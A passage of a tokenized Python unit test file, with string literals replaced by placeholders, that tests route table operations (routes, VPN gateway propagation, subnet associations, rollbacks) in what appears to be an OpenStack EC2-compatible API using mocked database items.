'<STR_LIT>' ) } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : id_ec2_eni_vpc_2 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_2 } , <EOL> '<STR_LIT>' ) <EOL> self . add_mock_db_items ( eni_2_in_instance_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> '<STR_LIT>' ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_2 } , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_or_replace_route_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 , <EOL> fakes . gen_db_igw ( fakes . ID_EC2_IGW_2 , fakes . ID_EC2_VPC_1 ) ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } ) <EOL> self . db_api . update_item . assert_called_with ( mock . ANY , <EOL> fakes . DB_ROUTE_TABLE_1 ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } ) <EOL> self . db_api . update_item . assert_called_with ( mock . ANY , <EOL> fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route ( self , routes_updater ) : <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_IGW_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . set_mock_db_items ( <EOL> route_table , fakes . DB_VPC_1 , fakes . DB_IGW_1 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_NETWORK_INTERFACE_1 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . db_api . update_item . assert_called_once_with ( mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = route_table_api . HOST_TARGET ) <EOL> def test_replace_route_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_route ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : <EOL> fakes . CIDR_EXTERNAL_NETWORK } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> route_table [ '<STR_LIT>' ] = [ <EOL> r for r in route_table [ '<STR_LIT>' ] <EOL> if r [ '<STR_LIT>' ] != fakes . CIDR_EXTERNAL_NETWORK ] <EOL> self . db_api . update_item . assert_called_once_with ( mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = route_table_api . HOST_TARGET ) <EOL> def test_delete_route_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPC_1 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_delete_route_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_enable_vgw_route_propagation ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> route_table_1_updated = tools . update_dict ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ fakes . ID_EC2_VPN_GATEWAY_1 ] } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table_1_updated ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table_1_updated , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> self . db_api . reset_mock ( ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_2 , <EOL> tools . update_dict ( fakes . DB_VPN_GATEWAY_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> db_route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> db_route_table_2 [ '<STR_LIT>' ] . append ( <EOL> fakes . ID_EC2_VPN_GATEWAY_2 ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , db_route_table_2 ) <EOL> def test_enable_vgw_route_propagation_idempotent ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . assertFalse ( self . db_api . update_item . called ) <EOL> def test_enable_vgw_route_propagation_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_VPN_GATEWAY_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_2 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> tools . update_dict ( fakes . DB_VPN_GATEWAY_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_2 } ) ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_enable_vgw_route_propagation_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPN_GATEWAY_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . db_api . update_item . assert_called_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disable_vgw_route_propagation ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> route_table_1_updated = tools . purge_dict ( <EOL> fakes . DB_ROUTE_TABLE_2 , ( '<STR_LIT>' , ) ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table_1_updated ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table_1_updated , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> db_route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> db_route_table_2 [ '<STR_LIT>' ] . append ( <EOL> fakes . ID_EC2_VPN_GATEWAY_2 ) <EOL> self . set_mock_db_items ( db_route_table_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> self . assertFalse ( routes_updater . called ) <EOL> def test_disable_vgw_route_propagation_idempotent ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , resp ) <EOL> self . assertFalse ( self . db_api . update_item . called ) <EOL> def test_disable_vgw_route_propagation_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disable_vgw_route_propagation_rollbadk ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPN_GATEWAY_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> self . db_api . update_item . assert_called_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate_route_table ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 , fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_SUBNET_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } ) <EOL> self . assertEqual ( fakes . ID_EC2_SUBNET_1 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> resp [ '<STR_LIT>' ] ) <EOL> subnet_1 = tools . update_dict ( <EOL> fakes . DB_SUBNET_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_1 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_1 , fakes . DB_ROUTE_TABLE_1 ) <EOL> def test_associate_route_table_invalid_parameters ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } , <EOL> '<STR_LIT>' ) <EOL> id_ec2_subnet_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_subnet_vpc_2 = { '<STR_LIT:id>' : id_ec2_subnet_vpc_2 , <EOL> '<STR_LIT>' : fakes . random_os_id ( ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 } <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , db_subnet_vpc_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : id_ec2_subnet_vpc_2 } , <EOL> '<STR_LIT>' ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , subnet_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_2 } , <EOL> '<STR_LIT>' ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate_route_table_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 , fakes . DB_ROUTE_TABLE_1 , <EOL> fakes . DB_SUBNET_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 } ) <EOL> self . db_api . update_item . assert_any_call ( mock . ANY , fakes . DB_SUBNET_1 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 ) <EOL> resp = self . execute ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_2 , <EOL> resp [ '<STR_LIT>' ] ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_2 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association_main ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> resp [ '<STR_LIT>' ] ) <EOL> vpc = tools . update_dict ( <EOL> fakes . DB_VPC_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , vpc ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , fakes . DB_ROUTE_TABLE_2 , <EOL> default_associations_only = True ) <EOL> def test_replace_route_table_association_invalid_parameters ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_3 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_3 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_3 , <EOL> tools . purge_dict ( fakes . DB_SUBNET_2 , [ '<STR_LIT>' ] ) ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_3 } , <EOL> '<STR_LIT>' ) <EOL> id_ec2_subnet_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_subnet_vpc_2 = { '<STR_LIT:id>' : id_ec2_subnet_vpc_2 , <EOL> '<STR_LIT>' : fakes . random_os_id ( ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , db_subnet_vpc_2 ) <EOL> do_check ( { '<STR_LIT>' : ec2utils . change_ec2_id_kind ( <EOL> id_ec2_subnet_vpc_2 , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_replace_route_table_association_rollback ( self , routes_updater , <EOL> multiply_routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_ROUTE_TABLE_3 , fakes . DB_SUBNET_2 , <EOL> fakes . DB_VPC_1 ) <EOL> multiply_routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_VPC_1 ) <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> with tools . ScreeningLogger ( log_name = '<STR_LIT>' ) : <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_SUBNET_2 ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate_route_table ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 , fakes . DB_VPC_1 ) <EOL> resp = self . execute ( <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> subnet_1 = tools . purge_dict ( fakes . DB_SUBNET_2 , ( '<STR_LIT>' , ) ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , subnet_1 ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , subnet_1 , fakes . DB_ROUTE_TABLE_1 ) <EOL> def test_disassociate_route_table_invalid_parameter ( self ) : <EOL> def do_check ( params , error_code ) : <EOL> self . assert_execution_error ( <EOL> error_code , '<STR_LIT>' , params ) <EOL> self . set_mock_db_items ( ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( <EOL> tools . purge_dict ( fakes . DB_SUBNET_1 , [ '<STR_LIT>' ] ) ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_2 } , <EOL> '<STR_LIT>' ) <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 } , <EOL> '<STR_LIT>' ) <EOL> @ tools . screen_unexpected_exception_logs <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate_route_table_rollback ( self , routes_updater ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_3 , <EOL> fakes . DB_SUBNET_2 , fakes . DB_VPC_1 ) <EOL> routes_updater . side_effect = Exception ( ) <EOL> self . assert_execution_error ( <EOL> self . ANY_EXECUTE_ERROR , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_3 } ) <EOL> self . db_api . update_item . assert_any_call ( <EOL> mock . ANY , fakes . DB_SUBNET_2 ) <EOL> def test_delete_route_table ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPC_1 , <EOL> fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> self . db_api . delete_item . assert_called_once_with ( <EOL> mock . ANY , <EOL> fakes . ID_EC2_ROUTE_TABLE_2 ) <EOL> def test_delete_route_table_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_1 , fakes . DB_VPC_1 ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> subnet = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> self . set_mock_db_items ( fakes . DB_ROUTE_TABLE_2 , fakes . DB_VPC_1 , subnet ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> def test_describe_route_tables ( self ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_ROUTE_TABLE_3 , fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_VPC_2 , fakes . DB_IGW_1 , fakes . DB_IGW_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_INSTANCE_1 , fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_VPN_CONNECTION_1 ) <EOL> self . nova . servers . get . return_value = ( <EOL> mock . NonCallableMock ( status = '<STR_LIT>' ) ) <EOL> resp = self . execute ( '<STR_LIT>' , { } ) <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . 